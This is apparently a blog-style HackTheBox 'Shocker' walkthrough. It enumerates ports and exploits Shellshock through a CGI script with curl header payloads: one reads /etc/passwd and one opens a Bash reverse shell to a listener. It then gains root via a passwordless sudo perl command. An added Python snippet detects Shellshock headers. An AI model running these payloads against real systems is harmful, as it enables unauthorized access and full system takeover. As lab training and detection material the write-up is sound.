HackTheBox - Shocker

Written by Erik on

Linux machine, easy level

Table of Contents

  1. Enumeration
  2. Exploitation
  3. Privilege Escalation

Enumeration:

Ports:

  • 80 HTTP
  • 2222 SSH

Nmap

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

Web Content

WebImage

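Fuzzing with dirbuster, we found a script at “/cgi-bin/user.sh”.

A script under /cgi-bin/ points to a very common vulnerability known as “Shellshock”: the web server passes request headers to the CGI script as environment variables, and a vulnerable Bash executes commands appended to a function definition in such a variable. With that, the text in the web image makes more sense.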

I found this page that helps us to exploit it.

Exploitation:

Use the payload that worked:

curl http://10.10.10.56/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
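
Seen from the server side, this request can be detected by its header value. The following is an added example, not part of the original write-up: it parses a raw HTTP request, flags any header whose value contains a Bash function definition, and reports the environment variable name under which a CGI script would receive it. The sample requests are constructed, and the function names are this example's own.

```python
import re

# A Bash function definition inside a header value: "() {".
# Unpatched Bash executed whatever followed the function body when importing it.
FUNC_DEF = re.compile(r"\(\s*\)\s*\{")

def cgi_env_name(header_name):
    """Name under which a CGI script sees a request header (RFC 3875)."""
    return "HTTP_" + header_name.upper().replace("-", "_")

def parse_headers(raw_request):
    """Return (request_line, [(name, value), ...]) from a raw HTTP/1.x request."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and headers:   # obsolete folded continuation
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return lines[0], headers

def find_shellshock(raw_request):
    """List a finding for every header whose value carries a function definition."""
    request_line, headers = parse_headers(raw_request)
    findings = []
    for name, value in headers:
        m = FUNC_DEF.search(value)
        if m:
            # Text after the function body's closing brace is what would be run.
            trailing = value[m.end():].partition("}")[2].lstrip("; ")
            findings.append({"request": request_line, "header": name,
                             "env": cgi_env_name(name), "trailing": trailing})
    return findings

# Constructed sample requests (not captured traffic).
BENIGN = (b"GET /cgi-bin/user.sh HTTP/1.1\r\nHost: 10.10.10.56\r\n"
          b"User-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n")
CRAFTED = (b"GET /cgi-bin/user.sh HTTP/1.1\r\nHost: 10.10.10.56\r\n"
           b"custom:() { ignored; }; echo Content-Type: text/html; echo ; "
           b"/bin/cat /etc/passwd\r\n\r\n")

if __name__ == "__main__":
    for req in (BENIGN, CRAFTED):
        print(find_shellshock(req) or "clean")
```

Apache's default combined access log records only the Referer and User-Agent request headers, so a payload carried in an arbitrary header such as `custom` does not appear there. A check like this has to run where full request headers are visible, for example in a reverse proxy, WAF or packet capture.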


Since the payload works, we use it to give ourselves a shell:

curl http://10.10.10.56/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/bash -i >& /dev/tcp/10.10.14.12/1234 0>&1" 

And we listen on that port.

Privilege Escalation:

In the shelly directory we find the user flag.

The first thing we usually do is to look at what binaries we can run as root. We found a command that can be run as root and we don’t need a password for it.

We look the binary up on GTFOBins to see how to use it for privilege escalation.

Proceed to exploit it:

sudo perl -e 'exec "/bin/sh";'

We are root.

Machine Completed

Erik

Hi! I'm Erik. I love computer security and in my spare time I do bug bounty or research.
Every day I try to learn something new, no matter how small it is.